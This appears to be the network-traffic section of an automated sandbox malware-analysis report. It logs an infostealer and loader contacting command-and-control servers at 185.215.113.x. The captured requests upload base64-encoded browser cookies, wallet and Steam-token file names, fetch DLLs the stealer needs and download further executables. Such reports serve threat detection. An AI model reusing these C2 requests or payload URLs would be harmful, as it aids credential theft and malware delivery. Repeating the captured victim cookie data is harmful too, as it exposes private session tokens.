Source: global traffic	HTTP traffic detected: POST /2fb6c2cc8dce150a.php HTTP/1.1Content-Type: multipart/form-data; boundary=----KEBFHIJECFIDGDGCGHCGHost: 185.215.113.17Content-Length: 268Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 4b 45 42 46 48 49 4a 45 43 46 49 44 47 44 47 43 47 48 43 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 38 39 35 34 63 37 33 61 66 36 34 66 63 65 35 34 34 61 30 62 33 30 30 31 30 35 65 38 63 31 61 31 36 34 39 35 35 37 30 34 38 61 38 37 38 31 32 38 39 31 63 39 62 31 30 35 39 31 33 66 66 64 34 34 64 31 30 31 39 36 63 62 0d 0a 2d 2d 2d 2d 2d 2d 4b 45 42 46 48 49 4a 45 43 46 49 44 47 44 47 43 47 48 43 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 66 70 6c 75 67 69 6e 73 0d 0a 2d 2d 2d 2d 2d 2d 4b 45 42 46 48 49 4a 45 43 46 49 44 47 44 47 43 47 48 43 47 2d 2d 0d 0a Data Ascii: ------KEBFHIJECFIDGDGCGHCGContent-Disposition: form-data; name="token"8954c73af64fce544a0b300105e8c1a1649557048a87812891c9b105913ffd44d10196cb------KEBFHIJECFIDGDGCGHCGContent-Disposition: form-data; name="message"fplugins------KEBFHIJECFIDGDGCGHCG--
Source: global traffic	HTTP traffic detected: POST /2fb6c2cc8dce150a.php HTTP/1.1Content-Type: multipart/form-data; boundary=----HCBAKJEHDBGHIEBGCGDGHost: 185.215.113.17Content-Length: 6539Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /f1ddeb6592c03206/sqlite3.dll HTTP/1.1Host: 185.215.113.17Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 30 30 31 32 39 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1000129001&unit=246122658369
Source: global traffic	HTTP traffic detected: GET /inc/BitcoinCore.exe HTTP/1.1Host: 185.215.113.16
Source: global traffic	HTTP traffic detected: POST /2fb6c2cc8dce150a.php HTTP/1.1Content-Type: multipart/form-data; boundary=----EGCFHDAKECFIDGDGDBKJHost: 185.215.113.17Content-Length: 751Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 45 47 43 46 48 44 41 4b 45 43 46 49 44 47 44 47 44 42 4b 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 38 39 35 34 63 37 33 61 66 36 34 66 63 65 35 34 34 61 30 62 33 30 30 31 30 35 65 38 63 31 61 31 36 34 39 35 35 37 30 34 38 61 38 37 38 31 32 38 39 31 63 39 62 31 30 35 39 31 33 66 66 64 34 34 64 31 30 31 39 36 63 62 0d 0a 2d 2d 2d 2d 2d 2d 45 47 43 46 48 44 41 4b 45 43 46 49 44 47 44 47 44 42 4b 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 59 32 39 76 61 32 6c 6c 63 31 78 48 62 32 39 6e 62 47 55 67 51 32 68 79 62 32 31 6c 58 30 52 6c 5a 6d 46 31 62 48 51 75 64 48 68 30 0d 0a 2d 2d 2d 2d 2d 2d 45 47 43 46 48 44 41 4b 45 43 46 49 44 47 44 47 44 42 4b 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 4c 6d 64 76 62 32 64 73 5a 53 35 6a 62 32 30 4a 56 46 4a 56 52 51 6b 76 43 55 5a 42 54 46 4e 46 43 54 45 32 4f 54 6b 77 4d 54 45 32 4d 54 55 4a 4d 56 42 66 53 6b 46 53 43 54 49 77 4d 6a 4d 74 4d 54 41 74 4d 44 51 74 4d 54 4d 4b 4c 6d 64 76 62 32 64 73 5a 53 35 6a 62 32 30 4a 52 6b 46 4d 55 30 55 4a 4c 77 6c 47 51 55 78 54 52 51 6b 78 4e 7a 45 79 4d 6a 4d 77 4f 44 45 31 43 55 35 4a 52 41 6b 31 4d 54 45 39 52 57 59 31 64 6c 42 47 52 33 63 74 54 56 70 5a 62 7a 56 6f 64 32 55 74 4d 46 52 6f 51 56 5a 7a 62 47 4a 34 59 6d 31 32 5a 46 5a 61 64 32 4e 49 62 6e 46 57 65 6c 64 49 51 56 55 78 4e 48 59 31 4d 30 31 4f 4d 56 5a 32 64 33 5a 52 63 54 68 69 59 56 6c 6d 5a 7a 49 74 53 55 46 30 63 56 70 43 56 6a 56 4f 54 30 77 31 63 6e 5a 71 4d 6b 35 58 53 58 46 79 65 6a 4d 33 4e 31 56 6f 54 47 52 49 64 45 39 6e 52 53 31 30 53 6d 46 43 62 46 56 43 57 55 70 46 61 48 56 48 63 31 46 6b 63 57 35 70 4d 32 39 55 53 6d 63 77 59 6e 4a 78 64 6a 46 6b 61 6d 52 70 54 45 70 35 64 6c 52 54 56 57 68 6b 53 79 31 6a 4e 55 70 58 59 57 52 44 55 33 4e 56 54 46 42 4d 65 6d 68 54 65 43 31 47 4c 54 5a 33 54 32 63 30 43 67 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 45 47 43 46 48 44 41 4b 45 43 46 49 44 47 44 47 44 42 4b 4a 2d 2d 0d 0a Data Ascii: ------EGCFHDAKECFIDGDGDBKJContent-Disposition: form-data; name="token"8954c73af64fce544a0b300105e8c1a1649557048a87812891c9b105913ffd44d10196cb------EGCFHDAKECFIDGDGDBKJContent-Disposition: form-data; name="file_name"Y29va2llc1xHb29nbGUgQ2hyb21lX0RlZmF1bHQudHh0------EGCFHDAKECFIDGDGDBKJContent-Disposition: form-data; name="file"Lmdvb2dsZS5jb20JVFJVRQkvCUZBTFNFCTE2OTkwMTE2MTUJMVBfSkFSCTIwMjMtMTAtMDQtMTMKLmdvb2dsZS5jb20JRkFMU0UJLwlGQUxTRQkxNzEyMjMwODE1CU5JRAk1MTE9RWY1dlBGR3ctTVpZbzVod2UtMFRoQVZzbGJ4Y
Source: global traffic	HTTP traffic detected: POST /2fb6c2cc8dce150a.php HTTP/1.1Content-Type: multipart/form-data; boundary=----JDGCFBAFBFHJEBGCAEGHHost: 185.215.113.17Content-Length: 363Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 4a 44 47 43 46 42 41 46 42 46 48 4a 45 42 47 43 41 45 47 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 38 39 35 34 63 37 33 61 66 36 34 66 63 65 35 34 34 61 30 62 33 30 30 31 30 35 65 38 63 31 61 31 36 34 39 35 35 37 30 34 38 61 38 37 38 31 32 38 39 31 63 39 62 31 30 35 39 31 33 66 66 64 34 34 64 31 30 31 39 36 63 62 0d 0a 2d 2d 2d 2d 2d 2d 4a 44 47 43 46 42 41 46 42 46 48 4a 45 42 47 43 41 45 47 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 32 31 71 62 47 78 74 65 57 31 73 59 6e 70 78 4c 6e 42 33 5a 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 4a 44 47 43 46 42 41 46 42 46 48 4a 45 42 47 43 41 45 47 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d 2d 4a 44 47 43 46 42 41 46 42 46 48 4a 45 42 47 43 41 45 47 48 2d 2d 0d 0a Data Ascii: ------JDGCFBAFBFHJEBGCAEGHContent-Disposition: form-data; name="token"8954c73af64fce544a0b300105e8c1a1649557048a87812891c9b105913ffd44d10196cb------JDGCFBAFBFHJEBGCAEGHContent-Disposition: form-data; name="file_name"c21qbGxteW1sYnpxLnB3ZA==------JDGCFBAFBFHJEBGCAEGHContent-Disposition: form-data; name="file"------JDGCFBAFBFHJEBGCAEGH--
Source: global traffic	HTTP traffic detected: POST /2fb6c2cc8dce150a.php HTTP/1.1Content-Type: multipart/form-data; boundary=----CFHDBFIEGIDGIECBKJECHost: 185.215.113.17Content-Length: 363Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 43 46 48 44 42 46 49 45 47 49 44 47 49 45 43 42 4b 4a 45 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 38 39 35 34 63 37 33 61 66 36 34 66 63 65 35 34 34 61 30 62 33 30 30 31 30 35 65 38 63 31 61 31 36 34 39 35 35 37 30 34 38 61 38 37 38 31 32 38 39 31 63 39 62 31 30 35 39 31 33 66 66 64 34 34 64 31 30 31 39 36 63 62 0d 0a 2d 2d 2d 2d 2d 2d 43 46 48 44 42 46 49 45 47 49 44 47 49 45 43 42 4b 4a 45 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 32 31 71 62 47 78 74 65 57 31 73 59 6e 70 78 4c 6e 42 33 5a 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 43 46 48 44 42 46 49 45 47 49 44 47 49 45 43 42 4b 4a 45 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d 2d 43 46 48 44 42 46 49 45 47 49 44 47 49 45 43 42 4b 4a 45 43 2d 2d 0d 0a Data Ascii: ------CFHDBFIEGIDGIECBKJECContent-Disposition: form-data; name="token"8954c73af64fce544a0b300105e8c1a1649557048a87812891c9b105913ffd44d10196cb------CFHDBFIEGIDGIECBKJECContent-Disposition: form-data; name="file_name"c21qbGxteW1sYnpxLnB3ZA==------CFHDBFIEGIDGIECBKJECContent-Disposition: form-data; name="file"------CFHDBFIEGIDGIECBKJEC--
Source: global traffic	HTTP traffic detected: GET /f1ddeb6592c03206/freebl3.dll HTTP/1.1Host: 185.215.113.17Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /f1ddeb6592c03206/mozglue.dll HTTP/1.1Host: 185.215.113.17Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /f1ddeb6592c03206/msvcp140.dll HTTP/1.1Host: 185.215.113.17Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 30 30 31 39 31 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1000191001&unit=246122658369
Source: global traffic	HTTP traffic detected: GET /f1ddeb6592c03206/nss3.dll HTTP/1.1Host: 185.215.113.17Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /3803980/whiteheroin.exe?hash=AgADjF HTTP/1.1Host: ddl.safone.dev
Source: global traffic	HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 31Cache-Control: no-cacheData Raw: 65 30 3d 31 30 30 30 32 30 39 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: e0=1000209001&unit=246122658369
Source: global traffic	HTTP traffic detected: GET /f1ddeb6592c03206/softokn3.dll HTTP/1.1Host: 185.215.113.17Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /f1ddeb6592c03206/vcruntime140.dll HTTP/1.1Host: 185.215.113.17Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /2fb6c2cc8dce150a.php HTTP/1.1Content-Type: multipart/form-data; boundary=----BFIJEHCBAKFCAKFHCGDGHost: 185.215.113.17Content-Length: 1067Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /2fb6c2cc8dce150a.php HTTP/1.1Content-Type: multipart/form-data; boundary=----JKECFCFBGDHIECAAFIIDHost: 185.215.113.17Content-Length: 267Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 4a 4b 45 43 46 43 46 42 47 44 48 49 45 43 41 41 46 49 49 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 38 39 35 34 63 37 33 61 66 36 34 66 63 65 35 34 34 61 30 62 33 30 30 31 30 35 65 38 63 31 61 31 36 34 39 35 35 37 30 34 38 61 38 37 38 31 32 38 39 31 63 39 62 31 30 35 39 31 33 66 66 64 34 34 64 31 30 31 39 36 63 62 0d 0a 2d 2d 2d 2d 2d 2d 4a 4b 45 43 46 43 46 42 47 44 48 49 45 43 41 41 46 49 49 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 77 61 6c 6c 65 74 73 0d 0a 2d 2d 2d 2d 2d 2d 4a 4b 45 43 46 43 46 42 47 44 48 49 45 43 41 41 46 49 49 44 2d 2d 0d 0a Data Ascii: ------JKECFCFBGDHIECAAFIIDContent-Disposition: form-data; name="token"8954c73af64fce544a0b300105e8c1a1649557048a87812891c9b105913ffd44d10196cb------JKECFCFBGDHIECAAFIIDContent-Disposition: form-data; name="message"wallets------JKECFCFBGDHIECAAFIID--
Source: global traffic	HTTP traffic detected: POST /2fb6c2cc8dce150a.php HTTP/1.1Content-Type: multipart/form-data; boundary=----IIECFHDBAAECAAKFHDHIHost: 185.215.113.17Content-Length: 265Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 49 49 45 43 46 48 44 42 41 41 45 43 41 41 4b 46 48 44 48 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 38 39 35 34 63 37 33 61 66 36 34 66 63 65 35 34 34 61 30 62 33 30 30 31 30 35 65 38 63 31 61 31 36 34 39 35 35 37 30 34 38 61 38 37 38 31 32 38 39 31 63 39 62 31 30 35 39 31 33 66 66 64 34 34 64 31 30 31 39 36 63 62 0d 0a 2d 2d 2d 2d 2d 2d 49 49 45 43 46 48 44 42 41 41 45 43 41 41 4b 46 48 44 48 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 66 69 6c 65 73 0d 0a 2d 2d 2d 2d 2d 2d 49 49 45 43 46 48 44 42 41 41 45 43 41 41 4b 46 48 44 48 49 2d 2d 0d 0a Data Ascii: ------IIECFHDBAAECAAKFHDHIContent-Disposition: form-data; name="token"8954c73af64fce544a0b300105e8c1a1649557048a87812891c9b105913ffd44d10196cb------IIECFHDBAAECAAKFHDHIContent-Disposition: form-data; name="message"files------IIECFHDBAAECAAKFHDHI--
Source: global traffic	HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 31Cache-Control: no-cacheData Raw: 65 30 3d 31 30 30 30 32 32 33 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: e0=1000223001&unit=246122658369
Source: global traffic	HTTP traffic detected: POST /2fb6c2cc8dce150a.php HTTP/1.1Content-Type: multipart/form-data; boundary=----KKKJEHCGCGDAAAKFHJKJHost: 185.215.113.17Content-Length: 363Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 4b 4b 4b 4a 45 48 43 47 43 47 44 41 41 41 4b 46 48 4a 4b 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 38 39 35 34 63 37 33 61 66 36 34 66 63 65 35 34 34 61 30 62 33 30 30 31 30 35 65 38 63 31 61 31 36 34 39 35 35 37 30 34 38 61 38 37 38 31 32 38 39 31 63 39 62 31 30 35 39 31 33 66 66 64 34 34 64 31 30 31 39 36 63 62 0d 0a 2d 2d 2d 2d 2d 2d 4b 4b 4b 4a 45 48 43 47 43 47 44 41 41 41 4b 46 48 4a 4b 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 33 52 6c 59 57 31 66 64 47 39 72 5a 57 35 7a 4c 6e 52 34 64 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 4b 4b 4b 4a 45 48 43 47 43 47 44 41 41 41 4b 46 48 4a 4b 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d 2d 4b 4b 4b 4a 45 48 43 47 43 47 44 41 41 41 4b 46 48 4a 4b 4a 2d 2d 0d 0a Data Ascii: ------KKKJEHCGCGDAAAKFHJKJContent-Disposition: form-data; name="token"8954c73af64fce544a0b300105e8c1a1649557048a87812891c9b105913ffd44d10196cb------KKKJEHCGCGDAAAKFHJKJContent-Disposition: form-data; name="file_name"c3RlYW1fdG9rZW5zLnR4dA==------KKKJEHCGCGDAAAKFHJKJContent-Disposition: form-data; name="file"------KKKJEHCGCGDAAAKFHJKJ--
Source: global traffic	HTTP traffic detected: POST /2fb6c2cc8dce150a.php HTTP/1.1Content-Type: multipart/form-data; boundary=----EHDGCGIDAKEBKECAFIEHHost: 185.215.113.17Content-Length: 272Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 45 48 44 47 43 47 49 44 41 4b 45 42 4b 45 43 41 46 49 45 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 38 39 35 34 63 37 33 61 66 36 34 66 63 65 35 34 34 61 30 62 33 30 30 31 30 35 65 38 63 31 61 31 36 34 39 35 35 37 30 34 38 61 38 37 38 31 32 38 39 31 63 39 62 31 30 35 39 31 33 66 66 64 34 34 64 31 30 31 39 36 63 62 0d 0a 2d 2d 2d 2d 2d 2d 45 48 44 47 43 47 49 44 41 4b 45 42 4b 45 43 41 46 49 45 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 79 62 6e 63 62 68 79 6c 65 70 6d 65 0d 0a 2d 2d 2d 2d 2d 2d 45 48 44 47 43 47 49 44 41 4b 45 42 4b 45 43 41 46 49 45 48 2d 2d 0d 0a Data Ascii: ------EHDGCGIDAKEBKECAFIEHContent-Disposition: form-data; name="token"8954c73af64fce544a0b300105e8c1a1649557048a87812891c9b105913ffd44d10196cb------EHDGCGIDAKEBKECAFIEHContent-Disposition: form-data; name="message"ybncbhylepme------EHDGCGIDAKEBKECAFIEH--
Source: global traffic	HTTP traffic detected: GET /3830515/PureSyncInst.exe?hash=AgADvR HTTP/1.1Host: ddl.safone.dev
Source: global traffic	HTTP traffic detected: POST /2fb6c2cc8dce150a.php HTTP/1.1Content-Type: multipart/form-data; boundary=----DGIJEGHDAECAKECAFCAKHost: 185.215.113.17Content-Length: 272Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 44 47 49 4a 45 47 48 44 41 45 43 41 4b 45 43 41 46 43 41 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 38 39 35 34 63 37 33 61 66 36 34 66 63 65 35 34 34 61 30 62 33 30 30 31 30 35 65 38 63 31 61 31 36 34 39 35 35 37 30 34 38 61 38 37 38 31 32 38 39 31 63 39 62 31 30 35 39 31 33 66 66 64 34 34 64 31 30 31 39 36 63 62 0d 0a 2d 2d 2d 2d 2d 2d 44 47 49 4a 45 47 48 44 41 45 43 41 4b 45 43 41 46 43 41 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 77 6b 6b 6a 71 61 69 61 78 6b 68 62 0d 0a 2d 2d 2d 2d 2d 2d 44 47 49 4a 45 47 48 44 41 45 43 41 4b 45 43 41 46 43 41 4b 2d 2d 0d 0a Data Ascii: ------DGIJEGHDAECAKECAFCAKContent-Disposition: form-data; name="token"8954c73af64fce544a0b300105e8c1a1649557048a87812891c9b105913ffd44d10196cb------DGIJEGHDAECAKECAFCAKContent-Disposition: form-data; name="message"wkkjqaiaxkhb------DGIJEGHDAECAKECAFCAK--
Source: global traffic	HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 30 30 32 32 38 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1000228001&unit=246122658369
Source: global traffic	HTTP traffic detected: GET /inc/runtime.exe HTTP/1.1Host: 185.215.113.16
Source: global traffic	HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 30 30 32 33 34 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1000234001&unit=246122658369
Source: global traffic	HTTP traffic detected: GET /inc/Amadeus.exe HTTP/1.1Host: 185.215.113.16
Source: global traffic	HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 30 30 32 33 38 30 30 32 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1000238002&unit=246122658369
Source: global traffic	HTTP traffic detected: POST /CoreOPT/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /CoreOPT/index.php?scr=1 HTTP/1.1Content-Type: multipart/form-data; boundary=----ODYwMTk=Host: 185.215.113.19Content-Length: 86171Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /CoreOPT/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 38 36 34 37 42 35 30 44 37 39 41 46 38 34 37 35 38 42 46 32 45 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 35 35 41 33 34 46 33 45 37 34 34 32 41 37 34 36 35 41 31 46 46 34 39 30 30 42 32 44 45 46 33 43 30 41 30 41 41 39 42 43 32 32 43 38 44 31 35 39 32 34 35 35 45 37 42 35 38 30 39 41 43 Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2A8647B50D79AF84758BF2EB81278509C05BEA3669A52777FA613555A34F3E7442A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AC
Source: global traffic	HTTP traffic detected: GET /d/385107 HTTP/1.1Host: 194.58.114.223
Source: global traffic	HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 36 46 44 41 34 34 34 43 45 46 43 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C6FDA444CEFCFD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Source: global traffic	HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /CoreOPT/index.php?scr=1 HTTP/1.1Content-Type: multipart/form-data; boundary=----OTAyMTg=Host: 185.215.113.19Content-Length: 90370Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 36 46 44 41 34 34 34 43 45 46 43 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C6FDA444CEFCFD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Source: global traffic	HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
